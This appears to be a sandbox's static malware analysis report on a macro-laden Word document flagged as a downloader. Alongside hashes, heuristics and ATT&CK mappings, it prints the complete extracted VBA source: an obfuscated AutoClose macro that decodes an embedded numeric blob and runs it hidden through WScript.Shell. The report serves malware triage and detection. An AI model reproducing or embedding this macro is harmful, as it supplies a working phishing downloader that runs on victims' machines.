Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 bf490a1a63c7e23b…

MALICIOUS

Office (OOXML)

36.5 KB Created: 2017-10-25 18:34:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2018-10-07
MD5: 918c7b5973b7205ca1e065561e403a29 SHA-1: a098c3094d73821f609be84ee5043fd3c5605d95 SHA-256: bf490a1a63c7e23b4afbe9140955b587457fef2c281c38defd8cde2c76c6f65b
292 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is an Office document containing VBA macros, specifically an Auto_Close macro that utilizes WScript.Shell and CreateObject to execute obfuscated code. This code, when deobfuscated, likely downloads and executes a second-stage payload, as indicated by the ClamAV detection 'Doc.Malware.Emooodldr-6711604-0'. The use of VBA and the Auto_Close function points to a macro-based downloader.

Heuristics 8

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
      If Len(recluta) > 16 Then
    Call CreateObject("WScript.Shell").Run(recluta, vbHide)
  End If
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      If Len(recluta) > 16 Then
    Call CreateObject("WScript.Shell").Run(recluta, vbHide)
  End If
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
 Call Application.Run("isotopo", spigoloso("112732452619204522224724462737100951472437104533473048110319194724172716160315344735464532240531404533514749481951451604464551040745311722094515512504082732152227033421092245352320515111183636502726290326340915520315484827133215030433271636024136522731275133041148332338474445152918284242082802284700472306271633011202015104451045232539474951032651244226273345191947444515291828424208280228230627163301120201510445104523394735464532240531404533514749481951 …
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2010/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2502 bytes
SHA-256: 4b262ef9da3b0f0423c30f69b2b848e1e001c7699699725773991f4a0cfae5fe
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function smentito(piacere As Integer) As String
 Dim flacone() As Variant
 flacone = Array("+", "I", "T", "a", ".", "O", "\", "W", "D", "i", "x", "p", "V", "u", "=", "n", "m", "C", ":", "s", "h", "F", "l", "'", "-", ")", "r", "o", "A", "v", "B", "b", "w", "c", "d", "(", "/", "E", ",", ";", "j", "Z", "P", "?", "$", "e", "N", " ", "y", "S", "f", "t", "g")
 Dim tostatura As Integer
 
 For tostatura = LBound(flacone) To UBound(flacone)
   If tostatura = piacere Then
    smentito = flacone(tostatura)
   End If
 Next
 
End Function

Function spigoloso(Optional troppo As String, Optional troppo2)
  agave = transito(Trim(troppo))
  For tostatura = 0 To Len(troppo)
  
    Dim nemmeno As String
    Dim cifrare As Integer
    If (tostatura + 1) <= UBound(agave) Then
    vano = prugna(Array(vano, smentito(Int(agave(tostatura) + agave(tostatura + 1)))))
    tostatura = tostatura + 1
    End If
  Next
  
  spigoloso = vano
End Function


Public Function isotopo(recluta As String)
  If Len(recluta) > 16 Then
    Call CreateObject("WScript.Shell").Run(recluta, vbHide)
  End If
End Function

Sub AutoClose()
 Call Application.Run("isotopo", spigoloso("1127324526192045222247244627371009514724371045334730481103191947241727161603153447354645322405314045335147494819514516044645510407453117220945155125040827321522270334210922453523205151111836365027262903263409155203154848271332150304332716360241365227312751330411483323384744451529182842420828022847004723062716330112020151044510452325394749510326512442262733451919474445152918284242082802282306271633011202015104451045233947354645322405314045335147494819514516044645510407453117220945155125040827321522270334495126091552352320515111183636502726290326340915520315484827133215030433271636190411201143093414522731275133232539"))
End Sub

Function prugna(perforare As Variant)
 rumine = ""
 
 For babele = 0 To UBound(perforare)
   rumine = rumine & "" & perforare(babele)
 Next
 
 prugna = rumine
End Function



Function transito(incubo As String, Optional impiego As Integer) As Variant
    transito = Split(Left(StrConv(incubo, vbUnicode), Len(StrConv(incubo, vbUnicode)) - 1), vbNullChar)
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 12288 bytes
SHA-256: 87bb4d939c941ccc055e2539c43ab9060ba853cb6bb2689c9b50d547cd313ca8
Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.